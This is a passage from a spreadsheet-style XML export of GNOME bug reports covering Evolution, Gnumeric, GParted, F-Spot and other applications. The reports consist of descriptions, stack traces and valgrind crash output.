        v_pointer = 0x4150ab90}}} {g_type = 1 data = {{v_int =
-1073745000 v_uint = 3221222296 v_long = -1073745000 v_ulong =
3221222296 
        v_int64 = 4705705303889408920 v_uint64 = 4705705303889408920
v_float = -1.99962139 v_double = 3935253.4999985211 v_pointer =
0xbffff398} {
        v_int = 151561712 v_uint = 151561712 v_long = 151561712
v_ulong = 151561712 v_int64 = 343748945392 v_uint64 = 343748945392 
        v_float = 1.6448428e-33 v_double = 1.6983454471234587e-312
v_pointer = 0x908a5f0}}} {g_type = 3221222296 data = {{v_int =
1094755857 
        v_uint = 1094755857 v_long = 1094755857 v_ulong = 1094755857
v_int64 = 650953009777387025 v_uint64 = 650953009777387025 
        v_float = 12.0405436 v_double = 3.8223002503452666e-265
v_pointer = 0x4140a611} {v_int = 134851200 v_uint = 134851200 v_long
= 134851200 
        v_ulong = 134851200 v_int64 = 4429818496</t>
  </si>
  <si>
    <t>gerardo</t>
  </si>
  <si>
    <t>YELP-161777</t>
  </si>
  <si>
    <t>Weird Use the systems default fonts message in Yelp</t>
  </si>
  <si>
    <t>#: data/yelp.schemas.in.h:8
msgid Use the systems default fonts.
This message makes no sense when I translate it. The message should probably be
using a genitive form instead either Use the system's default fonts or Use
the default fonts of the system.
The latter is what the GDP style guide recommends it explicitly discourages the
use of the Saxon genitive as used in the first example.</t>
  </si>
  <si>
    <t>menthos</t>
  </si>
  <si>
    <t>BANSHEE-526326</t>
  </si>
  <si>
    <t>BANSHEE</t>
  </si>
  <si>
    <t>Song info window style</t>
  </si>
  <si>
    <t>The song info window (when you hover the mouse above the notification window) should either use the Notification or Tooltip window hint. This would be nice for Compiz users who use the animation plugin because this info window currently gets the same animation as starting applications or dialogs get. For notification and tooltip windows (which seems to be fitting better) the default animation is a bit more restrained compared to the normal start animation (fade vs zoom).</t>
  </si>
  <si>
    <t>banshee-maint</t>
  </si>
  <si>
    <t>F-SPOT-353512</t>
  </si>
  <si>
    <t>F-Spot crashes when running it remotely with FreeNX</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Build F-Spot CVS or F_SPOT_QUERY branch CVS
2. Connect remotely to your machine with FreeNX (www.nomachine.com)
3. Run F-Spot
Stack trace:
DBus.DBusException: Unable to determine the address of the message bus
in  DBus.Bus:GetBus (BusType busType)
in  DBus.Bus:GetSessionBus ()
in  FSpot.Core:get_Connection ()
in  FSpot.Core:get_Service ()
in  FSpot.Core:AssertOwnership ()
in  FSpot.Driver:Main (System.String[] args)
Other information:
F-Spot 0.11 packaged with Ubuntu Dapper Drake 6.06 runs correctly!
Any clue?
Marco</t>
  </si>
  <si>
    <t>gnome.org</t>
  </si>
  <si>
    <t>EVOLUTION-229147</t>
  </si>
  <si>
    <t>Improper enforcing of mail adresses</t>
  </si>
  <si>
    <t>Description of Problem:
In Evolution-&gt;Tools-&gt;Mail
configuration-&gt;Accounts-&gt;mail adress it's not
possible to set up an ccount if it doesn't have at
least one dot. So it has to be AT LEAST like
user@domain DOT something.
This it's at least an improper way to enforce a
valid email address. My offce has an intranet that
since it has it's own DNS it's called santander
so at least inside my network:
user@santander
it's a valid address.
Other MUA's (like Kmail yotu major competitor :-)
doesn't mind about the format of the address of
the user I think that would be better.
Steps to reproduce the problem:
1.- Try to setup an account without any dots in it.
Actual Results:
It's not possible
Additional Information:
Stock Evo in RH 7.3</t>
  </si>
  <si>
    <t>ruben</t>
  </si>
  <si>
    <t>GTK+-314408</t>
  </si>
  <si>
    <t>Programmatically accessing text from a GtkComboBoxEntry is non-obvious</t>
  </si>
  <si>
    <t>Distribution/Version: Ubuntu Hoary
1. Create a new GtkComboBoxEntry with gtk_combo_box_entry_new_text ()
2. Connect to the 'changed' signal
3. Type some text into the entry
4. Try to access text with most obvious method gtk_combo_box_get_active_text ()
5. Fail (returns NULL unless you explicitly select an element from the combo box)
6. Search google for half an hour
7. Find that the way to do this is with gtk_entry_get_text (GTK_ENTRY (GTK_BIN
(combo_box)-&gt;child)) (from
http://developer.gnome.org/doc/API/2.0/gtk/migrating-GtkCombo.html)
I would expect a convenience function to access this such as
gtk_combo_box_entry_get_text ().
There is no such function in gtk 2.6.</t>
  </si>
  <si>
    <t>EVOLUTION-332821</t>
  </si>
  <si>
    <t>Attachment bar can not be opened by gok</t>
  </si>
  <si>
    <t>Please describe the problem:
If I create a new message with some attachments attachment bar can not be grab
by gok. The attachment bar of new appointment in Calendar view is the same as
composer.
Steps to reproduce:
1. Lanch gok and evolution
2. Open a composer or a appointment editor
3. open attachment bar with gok and close it later
Actual results:
attachment bar can not be open or closed
Expected results:
attachment bar should be grabed by gok
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>boby.wang</t>
  </si>
  <si>
    <t>EOG-364426</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>EOG</t>
  </si>
  <si>
    <t>doesn't allow to go to next image for a non-local directory</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/eog/+bug/67372
When a file is opened on a Samba-share it's not possible to open the next image with Go Next Image . Note that in the lower-right corner there's no indication of number of files e.g. '1/10' see attachment.
When copying (the same) files to e.g. /home/user it works as expected.
...
http://librarian.launchpad.net/4920959/scrolling-eye-of-gnome.png
Screenshot showing number a files to loop through
Attached a screenshot
Detected on Edgy RC1 Eye of GNOME 2.16.1</t>
  </si>
  <si>
    <t>eog-maint</t>
  </si>
  <si>
    <t>GPARTED-509495</t>
  </si>
  <si>
    <t>should be installed in /usr/sbin</t>
  </si>
  <si>
    <t>Please describe the problem:
This comes from Debian:
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=459976
Here the rationale: since gparted cannot be run as a normal user and
it's indeed a non-essential binary it should be installed in
/usr/sbin and not /usr/bin according to the FHS-2.3:
  http://www.pathname.com/fhs/pub/fhs-2.3.html#USRSBINNONESSENTIALSTANDARDSYSTEMBI
  /usr/sbin : Non-essential standard system binaries
  This directory contains any non-essential binaries used exclusively
  by the system administrator. System administration programs that are
  required for system repair system recovery mounting /usr or other
  essential functions must be placed in /sbin instead.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>gparted-maint</t>
  </si>
  <si>
    <t>luca</t>
  </si>
  <si>
    <t>GNUMERIC-518939</t>
  </si>
  <si>
    <t>Charting</t>
  </si>
  <si>
    <t>Chart-related valgrind errors</t>
  </si>
  <si>
    <t>Version: r16411 (gnumeric) r2037 (goffice)
OS: Ubuntu Gutsy
The upcoming sample is a fuzzed version of chart-tests-excel.xls.
Steps to reproduce:
- Load the upcoming attachment in Gnumeric to trigger a crash
Partial valgrind output:
==6120== Invalid read of size 4
==6120==    at 0x45E83EE: gog_chart_get_axes (gog-chart.c:734)
==6120==    by 0x6E633D7: set_radial_axes (ms-chart.c:1657)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2AC2D: ms_escher_read_SpContainer (ms-escher.c:507)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2C6DB: ms_escher_read_SpgrContainer (ms-escher.c:1933)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==  Address 0x905B9E8 is 0 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120== 
==6120== Invalid read of size 4
==6120==    at 0x4C832F4: g_type_check_instance_is_a (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45E841A: gog_chart_get_axes (gog-chart.c:734)
==6120==    by 0x6E633D7: set_radial_axes (ms-chart.c:1657)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2AC2D: ms_escher_read_SpContainer (ms-escher.c:507)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2C6DB: ms_escher_read_SpgrContainer (ms-escher.c:1933)
==6120==  Address 0x905B9E8 is 0 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120== 
==6120== Invalid read of size 4
==6120==    at 0x4C857F2: g_type_check_instance_cast (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD0D2: gog_object_set_parent (gog-object.c:1610)
==6120==    by 0x45DD382: gog_object_add_by_role (gog-object.c:1667)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E63489: set_radial_axes (ms-chart.c:1662)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2AC2D: ms_escher_read_SpContainer (ms-escher.c:507)
==6120==  Address 0x905B9E8 is 0 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
(lt-gnumeric:6120): GLib-GObject-WARNING **: invalid unclassed pointer in cast to `GogObject'
==6120== 
==6120== Invalid read of size 4
==6120==    at 0x45DD0D3: gog_object_set_parent (gog-object.c:1610)
==6120==    by 0x45DD382: gog_object_add_by_role (gog-object.c:1667)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E63489: set_radial_axes (ms-chart.c:1662)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==    by 0x6E2AC2D: ms_escher_read_SpContainer (ms-escher.c:507)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==  Address 0x905BA00 is 24 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120== 
==6120== Invalid read of size 4
==6120==    at 0x4C857F2: g_type_check_instance_cast (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DB542: gog_object_generate_id (gog-object.c:926)
==6120==    by 0x45DD128: gog_object_set_parent (gog-object.c:1618)
==6120==    by 0x45DD382: gog_object_add_by_role (gog-object.c:1667)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E63489: set_radial_axes (ms-chart.c:1662)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==  Address 0x905B9E8 is 0 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
(lt-gnumeric:6120): GLib-GObject-WARNING **: invalid unclassed pointer in cast to `GogObject'
==6120== 
==6120== Invalid read of size 4
==6120==    at 0x45DB1ED: gog_object_is_same_type (gog-object.c:860)
==6120==    by 0x45DB557: gog_object_generate_id (gog-object.c:927)
==6120==    by 0x45DD128: gog_object_set_parent (gog-object.c:1618)
==6120==    by 0x45DD382: gog_object_add_by_role (gog-object.c:1667)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E63489: set_radial_axes (ms-chart.c:1662)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)
==6120==    by 0x6E2CAB5: ms_escher_read_ClientData (ms-escher.c:1993)
==6120==    by 0x6E2D076: ms_escher_read_container (ms-escher.c:2099)
==6120==  Address 0x905BA00 is 24 bytes inside a block of size 340 free'd
==6120==    at 0x402237F: free (vg_replace_malloc.c:233)
==6120==    by 0x4CD0960: g_free (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4CE5196: g_slice_free1 (in /usr/lib/libglib-2.0.so.0.1400.1)
==6120==    by 0x4C86DF6: g_type_free_instance (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x4C6AAF3: g_object_unref (in /usr/lib/libgobject-2.0.so.0.1400.1)
==6120==    by 0x45DD399: gog_object_add_by_role (gog-object.c:1669)
==6120==    by 0x45DD45C: gog_object_add_by_name (gog-object.c:1688)
==6120==    by 0x6E633A3: set_radial_axes (ms-chart.c:1652)
==6120==    by 0x6E635CE: xl_chart_read_radararea (ms-chart.c:1696)
==6120==    by 0x6E693CC: ms_excel_chart_read (ms-chart.c:3451)
==6120==    by 0x6E69E09: ms_excel_chart_read_BOF (ms-chart.c:3667)
==6120==    by 0x6E5E9FE: ms_read_OBJ (ms-obj.c:1272)</t>
  </si>
  <si>
    <t>sum1abi</t>
  </si>
  <si>
    <t>EVOLUTION-241477</t>
  </si>
  <si>
    <t>Message color cannot be removed once applied to a message</t>
  </si>
  <si>
    <t>I change the color of messages in many of the filters that I have set up. 
Often I want to reset the message color back to the default black.
HAVE YOU EVER TRIED TO DO THIS????  It is just about impossible the only
method I have figured out is to design a new rule that just restores the
color and apply it the message in question.  Pretty bogus.  How about
making it an option in the right-click popup menu?  At least make it appear
in the Actions or Tools menus ...</t>
  </si>
  <si>
    <t>elsszmj02</t>
  </si>
  <si>
    <t>GPARTED-337513</t>
  </si>
  <si>
    <t>livecd crashed during boot after raid card detection on PowerEdge 2650 Server</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Put the gparted 0.2 or 0.2.3 livecd's into the drive and boot from them 
2. This is a Dell PowerEdge 2650 Server with a PERC 3/Di controller w/ a split backplane
3. There are 5 drives 2 in a RAID 1 configuration and 3 in RAID 5.
Stack trace:
I have a jpg image of the spot where it crashes.  Is there a way I can upload that image?
It loads the Adaptec aacraid driver
Assigns IRQ 10 for device 0000:04:00.1
...
qlogicfas: no cards were found please specify IRQ...
Emlex LightPulse Fiber Channel SCSI Driver..
seagate: ST0x/TMc-8xx not detected.
_
And that's where it hangs and sits.
Other information:</t>
  </si>
  <si>
    <t>strimmer</t>
  </si>
  <si>
    <t>LAST-EXIT-448927</t>
  </si>
  <si>
    <t>LAST-EXIT</t>
  </si>
  <si>
    <t>Crash when searching a station</t>
  </si>
  <si>
    <t>OS : ubuntu feisty
Last-exit version : v5 or svn Trunk
Language : french (I think that's important)
When I searching a station by artiste or tag Last-exit crash:
Unhandled Exception: System.FormatException: Invalid character at position 2
[...]
at System.Decimal.Parse (string) [0x00000] in /build/buildd/mono-1.2.3.1/mcs/class/corlib/System/Decimal.cs:694
at LastExit.FindStation.ParseSimilar (string) 
at LastExit.FindStation.FindStationCompleted (LastExit.FMRequest) 
[...]
I looked the code of v5 and I dumped the XML which is parsed. I have something like that:
    Oceanlab
    a558ed3c-ab7d-49b8-a52d-14071b95fa4f
    99.29 &lt;------- look the decimal separator
I checked the FindStation.cs and I found that a NumberFormatInfo is given to Decimal.Parse for the function ParseTag but not for the function ParseSimilar. The NumberDecimalSeparator is forced to . to be the same than in the xml.
But the ParseTag throw also an exception.
I printed the NumberFormatInfo to the Console and I get :
match_fmt.NumberDecimalSeparator == .
match_fmt.NumberGroupSeparator == . &lt;---- haha! on my PC the groupSeparator == DecimalSeparator...
It's because my PC is french? Where can I change that (ubuntu settings)?
Anyway I purpose to correct that with :
NumberFormatInfo match_fmt = new NumberFormatInfo()
match_fmt.NumberDecimalSeparator = .
match_fmt.NumberGroupSeparator =  
[..]
Decimal.Parse (get_node_text (a_node match) match_fmt)
(don't forget to add in ParseTag AND ParseSimilar)</t>
  </si>
  <si>
    <t>last-exit-maint</t>
  </si>
  <si>
    <t>kluba.mathias</t>
  </si>
  <si>
    <t>NAUTILUS-48387</t>
  </si>
  <si>
    <t>[obsolete] Sidebar Panel: Tree</t>
  </si>
  <si>
    <t>Dragging elements to a folder entry should make it hilighted</t>
  </si>
  <si>
    <t xml:space="preserve">Currently if one selects a large group of objects (say thumbnails) and drags 
them to an entry in the Tree then there is no way to know to which entry the 
folders will be moved to if the button is released.
------- Additional Comments From mjs@noisehavoc.org 2001-07-21 04:08:45 ----
The tree was already darkening the drop target icon but I guess this was
too subtle. 
------- Additional Comments From mjs@noisehavoc.org 2001-07-21 04:17:05 ----
I made it draw the text bold in addition to darkening the icon this should be
easier to see I think.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
The original reporter (glargle123@yahoo.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>glargle123</t>
  </si>
  <si>
    <t>EVOLUTION-215001</t>
  </si>
  <si>
    <t>Crash after making virtual folder</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.99.0
Synopsis: Crash after making virtual folder
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Well I was doing a demo for a friend and made a new virtual folder.
Then when I'd made it the mailer crashed. Nice demo heh. :)
Anyway now Evolution mail crashes everytime I start it. Guess it's the
virtual folder it doesn't like or that the first crash made some
configs in a bad state.
The virtual folder was made on mails containing a string in from-field
on my inbox on an imap-server.
Anyway I can debug and do whatever you like to find out more. Just
ask.
Debugging Information:
[New Thread 1024 (LWP 8135)]
[New Thread 2049 (LWP 8181)]
[New Thread 1026 (LWP 8182)]
[New Thread 4100 (LWP 8187)]
0x40a25c09 in __wait4 () from /lib/libc.so.6
#0  0x40a25c09 in __wait4 () from /lib/libc.so.6
#1  0x40aa1fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4089c8de in waitpid (pid=8207 stat_loc=0xbffff43c options=0)
    at wrapsyscall.c:172
#3  0x4046c262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809c7dd in segv_redirect (sig=11) at main.c:69
#5  0x4089a4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136287160 esi = 15 ebp = 3221223432 esp = 3221223420 ebx = 136287280 edx = 79 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1084558316 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221223420 ss = 43 __ssh = 0 fpstate = 0xbffff580 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a50bec in __poll (fds=0x81f93b8 nfds=15 timeout=775)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40960a74 in g_main_poll (timeout=775 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40960465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x409607e8 in g_main_run (loop=0x81010e8) at gmain.c:935
#11 0x406147f7 in gtk_main () at gtkmain.c:524
#12 0x4031465f in bonobo_main () at bonobo-main.c:283
#13 0x0809c997 in main (argc=3 argv=0xbffffaac) at main.c:145
#14 0x4098e306 in __libc_start_main (main=0x809c808  argc=3 
    ubp_av=0xbffffaac init=0x8065d34  fini=0x80d2040  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa9c)
    at ../sysdeps/generic/libc-start.c:129
Thread 4 (Thread 4100 (LWP 8187)):
#0  0x409a0966 in __sigsuspend (set=0xbf3ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40899d61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x40895ee4 in pthread_cond_wait (cond=0x8125330 mutex=0x8125310)
    at restart.h:34
#3  0x40082086 in e_msgport_wait (mp=0x81252e8) at e-msgport.c:198
#4  0x400826ae in thread_dispatch (din=0x8125298) at e-msgport.c:517
#5  0x40896f87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 8182)):
#0  0x409a0966 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40899d61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x40895ee4 in pthread_cond_wait (cond=0x81251e0 mutex=0x81251c0)
    at restart.h:34
#3  0x40082086 in e_msgport_wait (mp=0x8125198) at e-msgport.c:198
#4  0x400826ae in thread_dispatch (din=0x8125148) at e-msgport.c:517
#5  0x40896f87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 8181)):
#0  0x40a50bec in __poll (fds=0x813ea0c nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x40896d0e in __pthread_manager (arg=0x18) at manager.c:140
Thread 1 (Thread 1024 (LWP 8135)):
#0  0x40a25c09 in __wait4 () from /lib/libc.so.6
#1  0x40aa1fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4089c8de in waitpid (pid=8207 stat_loc=0xbffff43c options=0)
    at wrapsyscall.c:172
#3  0x4046c262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809c7dd in segv_redirect (sig=11) at main.c:69
#5  0x4089a4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136287160 esi = 15 ebp = 3221223432 esp = 3221223420 ebx = 136287280 edx = 79 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1084558316 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221223420 ss = 43 __ssh = 0 fpstate = 0xbffff580 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a50bec in __poll (fds=0x81f93b8 nfds=15 timeout=775)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40960a74 in g_main_poll (timeout=775 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40960465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x409607e8 in g_main_run (loop=0x81010e8) at gmain.c:935
#11 0x406147f7 in gtk_main () at gtkmain.c:524
#12 0x4031465f in bonobo_main () at bonobo-main.c:283
#13 0x0809c997 in main (argc=3 argv=0xbffffaac) at main.c:145
#14 0x4098e306 in __libc_start_main (main=0x809c808  argc=3 
    ubp_av=0xbffffaac init=0x8065d34  fini=0x80d2040  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa9c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40a25c09 in __wait4 () from /lib/libc.so.6
#0  0x40a25c09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40aa1fd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4089c8de in waitpid (pid=8207 stat_loc=0xbffff43c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff43c
options = 0
result = 0
oldtype = 0
#3  0x4046c262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1080775732
in_segv = 1
pid = 0
#4  0x0809c7dd in segv_redirect (sig=11) at main.c:69
	in main.c
sig = 11
#5  0x4089a4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136287160 esi = 15 ebp = 3221223432 esp = 3221223420 ebx = 136287280 edx = 79 ecx = 15 eax = 4294967292 trapno = 0 err = 0 eip = 1084558316 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221223420 ss = 43 __ssh = 0 fpstate = 0xbffff580 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
